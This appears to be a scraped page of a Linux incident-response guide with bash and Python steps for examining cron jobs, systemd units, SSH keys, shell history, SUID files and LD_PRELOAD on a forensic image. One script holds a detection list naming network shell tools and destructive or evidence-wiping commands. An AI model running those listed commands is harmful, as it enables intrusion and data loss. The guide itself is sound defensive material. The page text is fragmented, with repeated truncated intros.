Analyzing Linux System Artifacts When to Use - When investigating a compromised Linux server or workstation - For identifying persistence mechanisms (cron, systemd, SSH keys) - When tracing user activity through shell history and authentication logs - During incident response to determine the scope of a Linux-based breach - For detecting rootkits, backdoors, and unauthorized modifications Prerequisites - Forensic image or live access to the Linux system (read-only) - Understanding of Linux file system hierarchy (FHS) - Knowledge of common Linux logging locations (/var/log/) - Tools: chkrootki…

): hash_type = 'yescrypt'\n elif pwd_hash.startswith('$1

Analyzing Linux System Artifacts When to Use - When investigating a compromised Linux server or workstation - For identifying persistence mechanisms (cron, systemd, SSH keys) - When tracing user activity through shell history and authentication logs - During incident response to determine the scope of a Linux-based breach - For detecting rootkits, backdoors, and unauthorized modifications Prerequisites - Forensic image or live access to the Linux system (read-only) - Understanding of Linux file system hierarchy (FHS) - Knowledge of common Linux logging locations (/var/log/) - Tools: chkrootki…

): hash_type = 'MD5 (WEAK)'\n print(f\" {username}: {hash_type} hash, last changed: day {last_change}\")\nPYEOF\n\n# Analyze login history\nlast -f /cases/case-2024-001/linux/logs/wtmp > /cases/case-2024-001/linux/analysis/login_history.txt\nlastb -f /cases/case-2024-001/linux/logs/btmp > /cases/case-2024-001/linux/analysis/failed_logins.txt 2>/dev/null","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Step 3: Examine Persistence Mechanisms","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Check cron jobs for all users\necho \"=== CRON JOBS ===\" > /cases/case-2024-001/linux/persistence/cron_analysis.txt\n\n# System cron\nfor cronfile in /mnt/evidence/etc/crontab /mnt/evidence/etc/cron.d/*; do\n echo \"--- $cronfile ---\" >> /cases/case-2024-001/linux/persistence/cron_analysis.txt\n cat \"$cronfile\" 2>/dev/null >> /cases/case-2024-001/linux/persistence/cron_analysis.txt\n echo \"\" >> /cases/case-2024-001/linux/persistence/cron_analysis.txt\ndone\n\n# User cron tabs\nfor cronfile in /mnt/evidence/var/spool/cron/crontabs/*; do\n echo \"--- User crontab: $(basename $cronfile) ---\" >> /cases/case-2024-001/linux/persistence/cron_analysis.txt\n cat \"$cronfile\" 2>/dev/null >> /cases/case-2024-001/linux/persistence/cron_analysis.txt\n echo \"\" >> /cases/case-2024-001/linux/persistence/cron_analysis.txt\ndone\n\n# Check systemd services for persistence\necho \"=== SYSTEMD SERVICES ===\" > /cases/case-2024-001/linux/persistence/systemd_analysis.txt\nfind /mnt/evidence/etc/systemd/system/ -name \"*.service\" -newer /mnt/evidence/etc/os-release \\\n >> /cases/case-2024-001/linux/persistence/systemd_analysis.txt\n\nfor svc in /mnt/evidence/etc/systemd/system/*.service; do\n echo \"--- $(basename $svc) ---\" >> /cases/case-2024-001/linux/persistence/systemd_analysis.txt\n cat \"$svc\" >> /cases/case-2024-001/linux/persistence/systemd_analysis.txt\n echo \"\" >> /cases/case-2024-001/linux/persistence/systemd_analysis.txt\ndone\n\n# Check authorized SSH keys (backdoor detection)\necho \"=== SSH AUTHORIZED KEYS ===\" > /cases/case-2024-001/linux/persistence/ssh_keys.txt\nfind /mnt/evidence/home/ /mnt/evidence/root/ -name \"authorized_keys\" -exec sh -c \\\n 'echo \"--- {} ---\"; cat {}; echo \"\"' \\; >> /cases/case-2024-001/linux/persistence/ssh_keys.txt\n\n# Check rc.local and init scripts\ncat /mnt/evidence/etc/rc.local 2>/dev/null > /cases/case-2024-001/linux/persistence/rc_local.txt\n\n# Check /etc/profile.d/ for login-triggered scripts\nls -la /mnt/evidence/etc/profile.d/ > /cases/case-2024-001/linux/persistence/profile_scripts.txt\n\n# Check for LD_PRELOAD hijacking\ngrep -r \"LD_PRELOAD\" /mnt/evidence/etc/ 2>/dev/null > /cases/case-2024-001/linux/persistence/ld_preload.txt\ncat /mnt/evidence/etc/ld.so.preload 2>/dev/null >> /cases/case-2024-001/linux/persistence/ld_preload.txt","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Step 4: Analyze Shell History and Command Execution","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Analyze bash history for each user\npython3 \u003c\u003c 'PYEOF'\nimport os, glob\n\nprint(\"=== SHELL HISTORY ANALYSIS ===\\n\")\n\nsuspicious_commands = [\n 'wget', 'curl', 'nc ', 'ncat', 'netcat', 'python -c', 'python3 -c',\n 'perl -e', 'base64', 'chmod 777', 'chmod +s', '/dev/tcp', '/dev/udp',\n 'nmap', 'masscan', 'hydra', 'john', 'hashcat', 'passwd', 'useradd',\n 'iptables -F', 'ufw disable', 'history -c', 'rm -rf /', 'dd if=',\n 'crontab', 'at ', 'systemctl enable', 'ssh-keygen', 'scp ', 'rsync',\n 'tar czf', 'zip -r', 'openssl enc', 'gpg --encrypt', 'shred',\n 'chattr', 'setfacl', 'awk', '/tmp/', '/dev/shm/'\n]\n\nfor hist_file in glob.glob('/cases/case-2024-001/linux/users/*/.bash_history'):\n username = hist_file.split('/')[-2]\n print(f\"User: {username}\")\n\n with open(hist_file, 'r', errors='ignore') as f:\n lines = f.readlines()\n\n print(f\" Total commands: {len(lines)}\")\n flagged = []\n for i, line in enumerate(lines):\n line = line.strip()\n for cmd in suspicious_commands:\n if cmd in line.lower():\n flagged.append((i+1, line))\n break\n\n if flagged:\n print(f\" Suspicious commands: {len(flagged)}\")\n for lineno, cmd in flagged:\n print(f\" Line {lineno}: {cmd[:120]}\")\n print()\nPYEOF","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Step 5: Check for Rootkits and Modified Binaries","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Check for known rootkit indicators\n# Compare system binary hashes against known-good\nfind /mnt/evidence/usr/bin/ /mnt/evidence/usr/sbin/ /mnt/evidence/bin/ /mnt/evidence/sbin/ \\\n -type f -executable -exec sha256sum {} \\; > /cases/case-2024-001/linux/analysis/binary_hashes.txt\n\n# Check for SUID/SGID binaries (potential privilege escalation)\nfind /mnt/evidence/ -perm -4000 -type f 2>/dev/null > /cases/case-2024-001/linux/analysis/suid_files.txt\nfind /mnt/evidence/ -perm -2000 -type f 2>/dev/null > /cases/case-2024-001/linux/analysis/sgid_files.txt\n\n# Check for suspicious files in /tmp and /dev/shm\nfind /mnt/evidence/tmp/ /mnt/evidence/dev/shm/ -type f 2>/dev/null \\\n -exec file {} \\; > /cases/case-2024-001/linux/analysis/tmp_files.txt\n\n# Check for hidden files and directories\nfind /mnt/evidence/ -name \".*\" -not -path \"*/\\.\" -type f 2>/dev/null | \\\n head -100 > /cases/case-2024-001/linux/analysis/hidden_files.txt\n\n# Check kernel modules\nls -la /mnt/evidence/lib/modules/$(ls /mnt/evidence/lib/modules/ | head -1)/extra/ 2>/dev/null \\\n > /cases/case-2024-001/linux/analysis/extra_modules.txt\n\n# Check for modified PAM configuration (authentication backdoors)\ndiff /mnt/evidence/etc/pam.d/ /cases/baseline/pam.d/ 2>/dev/null \\\n > /cases/case-2024-001/linux/analysis/pam_changes.txt","type":"text"}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Key Concepts","type":"text"}]},{"type":"table","attrs":{"layout":null},"content":[{"type":"tr","content":[{"type":"th","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Concept","type":"text"}]}]},{"type":"th","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Description","type":"text"}]}]}]},{"type":"tr","content":[{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"/var/log/auth.log","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Primary authentication log on Debian/Ubuntu systems","type":"text"}]}]}]},{"type":"tr","content":[{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"/var/log/secure","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Primary authentication log on RHEL/CentOS systems","type":"text"}]}]}]},{"type":"tr","content":[{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"wtmp/btmp","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Binary logs recording successful and failed login sessions","type":"text"}]}]}]},{"type":"tr","content":[{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":".bash_history","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"User command history file (can be cleared by attackers)","type":"text"}]}]}]},{"type":"tr","content":[{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"crontab","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Scheduled task system commonly used for persistence","type":"text"}]}]}]},{"type":"tr","content":[{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"authorized_keys","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"SSH public keys granting passwordless access to an account","type":"text"}]}]}]},{"type":"tr","content":[{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"SUID bit","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"File permission allowing execution as the file owner (privilege escalation vector)","type":"text"}]}]}]},{"type":"tr","content":[{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"LD_PRELOAD","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Environment variable that loads a shared library before all others (hooking technique)","type":"text"}]}]}]}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Tools & Systems","type":"text"}]},{"type":"table","attrs":{"layout":null},"content":[{"type":"tr","content":[{"type":"th","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Tool","type":"text"}]}]},{"type":"th","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Purpose","type":"text"}]}]}]},{"type":"tr","content":[{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"chkrootkit","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Rootkit detection scanner for Linux systems","type":"text"}]}]}]},{"type":"tr","content":[{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"rkhunter","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Rootkit Hunter - checks for rootkits, backdoors, and local exploits","type":"text"}]}]}]},{"type":"tr","content":[{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"AIDE","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Advanced Intrusion Detection Environment - file integrity monitor","type":"text"}]}]}]},{"type":"tr","content":[{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"auditd","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Linux audit framework for system call and file access monitoring","type":"text"}]}]}]},{"type":"tr","content":[{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"last/lastb","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Parse wtmp/btmp for login and failed login history","type":"text"}]}]}]},{"type":"tr","content":[{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Plaso/log2timeline","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Super-timeline creation including Linux artifacts","type":"text"}]}]}]},{"type":"tr","content":[{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"osquery","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"SQL-based system querying for live forensic investigation","type":"text"}]}]}]},{"type":"tr","content":[{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Velociraptor","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Endpoint agent with Linux artifact collection capabilities","type":"text"}]}]}]}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Common Scenarios","type":"text"}]},{"type":"paragraph","content":[{"text":"Scenario 1: SSH Brute Force Followed by Compromise","type":"text","marks":[{"type":"strong"}]},{"text":" Analyze auth.log for failed SSH attempts followed by success, identify the attacking IP, check .bash_history for post-compromise commands, examine authorized_keys for added backdoor keys, check crontab for persistence, review network connections.","type":"text"}]},{"type":"paragraph","content":[{"text":"Scenario 2: Web Server Compromise via Application Vulnerability","type":"text","marks":[{"type":"strong"}]},{"text":" Examine web server access and error logs for exploitation attempts, check /tmp and /dev/shm for webshells, analyze the web server user's activity (www-data), check for privilege escalation via SUID binaries or kernel exploits, review outbound connections.","type":"text"}]},{"type":"paragraph","content":[{"text":"Scenario 3: Insider Threat on Database Server","type":"text","marks":[{"type":"strong"}]},{"text":" Analyze the suspect user's bash_history for database dump commands, check for large tar/zip files in home directory or /tmp, examine scp/rsync commands for data transfer, review cron jobs for automated exfiltration, check USB device logs.","type":"text"}]},{"type":"paragraph","content":[{"text":"Scenario 4: Crypto-Miner on Cloud Instance","type":"text","marks":[{"type":"strong"}]},{"text":" Check for high-CPU processes in /proc (live) or systemd service files, examine crontab entries for miner restart scripts, check /tmp for mining binaries, analyze network connections for mining pool communications, review authorized_keys for attacker access.","type":"text"}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Output Format","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":""},"content":[{"text":"Linux Forensics Summary:\n System: webserver01 (Ubuntu 22.04 LTS)\n Hostname: webserver01.corp.local\n Kernel: 5.15.0-91-generic\n\n User Accounts:\n Total: 25 (3 with UID 0 - 1 ANOMALOUS)\n Interactive shells: 8 users\n Recently created: admin2 (created 2024-01-15)\n\n Authentication Events:\n Successful SSH logins: 456\n Failed SSH attempts: 12,345 (from 23 unique IPs)\n Sudo executions: 89\n\n Persistence Mechanisms Found:\n Cron jobs: 3 suspicious (reverse shell, miner restart)\n Systemd services: 1 unknown (update-checker.service)\n SSH keys: 2 unauthorized keys in root authorized_keys\n rc.local: Modified with download cradle\n\n Suspicious Activity:\n - bash_history contains wget to pastebin URL\n - SUID binary /tmp/.hidden/escalate found\n - /dev/shm/ contains compiled ELF binary\n - LD_PRELOAD in /etc/ld.so.preload pointing to /lib/.hidden.so\n\n Report: /cases/case-2024-001/linux/analysis/","type":"text"}]},{"type":"hr","attrs":{"markup":"---"}}]},"metadata":{"date":"2026-06-05","name":"analyzing-linux-system-artifacts","tags":["forensics","linux-forensics","system-artifacts","log-analysis","persistence-detection","incident-investigation"],"author":"@skillopedia","domain":"cybersecurity","source":{"stars":13207,"repo_name":"anthropic-cybersecurity-skills","origin_url":"https://github.com/mukul975/anthropic-cybersecurity-skills/blob/HEAD/skills/analyzing-linux-system-artifacts/SKILL.md","repo_owner":"mukul975","body_sha256":"5938495b20b2814cc2d8a4286e3a2dfb170256142546b984fc788416a5a6b221","cluster_key":"af933f8f26975f970e5b0f80cd14f7f9c8a9422028daa9bd5a3b6e2d545d2b3c","clean_bundle":{"format":"clean-skill-bundle-v1","source":"mukul975/anthropic-cybersecurity-skills/skills/analyzing-linux-system-artifacts/SKILL.md","attachments":[{"id":"199ccd3e-0aed-5e1f-b5a6-327479a7622a","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/199ccd3e-0aed-5e1f-b5a6-327479a7622a/attachment.md","path":"references/api-reference.md","size":3491,"sha256":"965f675c920085a7a68dcc41a7effc5eb5dc59b957194405d2b1d028d288c668","contentType":"text/markdown; charset=utf-8"},{"id":"33c04ea8-0a28-5c1b-b435-b7367b4adf4e","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/33c04ea8-0a28-5c1b-b435-b7367b4adf4e/attachment.py","path":"scripts/agent.py","size":9952,"sha256":"1075135007001b405b49bd5549cd0a3069f44fbc82715b8d312129cb677213dd","contentType":"text/x-python; charset=utf-8"}],"bundle_sha256":"dbed3c9a18a5172e658e6f7ff363c502f6ed3c8c0c0fca09794ac1df3411e2bf","attachment_count":2,"text_attachments":2,"attachment_storage":"skillopedia-attachments-v1","binary_attachments":0,"excluded_attachments":[]},"cluster_size":2,"skill_md_path":"skills/analyzing-linux-system-artifacts/SKILL.md","import_metadata":{"date":"2026-06-05","author":"@skillopedia","version":"v1","category":"security","category_label":"Security"},"exact_dupes_collapsed_into_this":1},"license":"Apache-2.0","version":"v1","category":"security","nist_csf":["RS.AN-01","RS.AN-03","DE.AE-02","RS.MA-01"],"subdomain":"digital-forensics","import_tag":"clean-skills-v1","description":"Examine Linux system artifacts including auth logs, cron jobs, shell history, and system configuration to uncover evidence of compromise or unauthorized activity."}},"renderedAt":1782986523629}

Analyzing Linux System Artifacts When to Use - When investigating a compromised Linux server or workstation - For identifying persistence mechanisms (cron, systemd, SSH keys) - When tracing user activity through shell history and authentication logs - During incident response to determine the scope of a Linux-based breach - For detecting rootkits, backdoors, and unauthorized modifications Prerequisites - Forensic image or live access to the Linux system (read-only) - Understanding of Linux file system hierarchy (FHS) - Knowledge of common Linux logging locations (/var/log/) - Tools: chkrootki…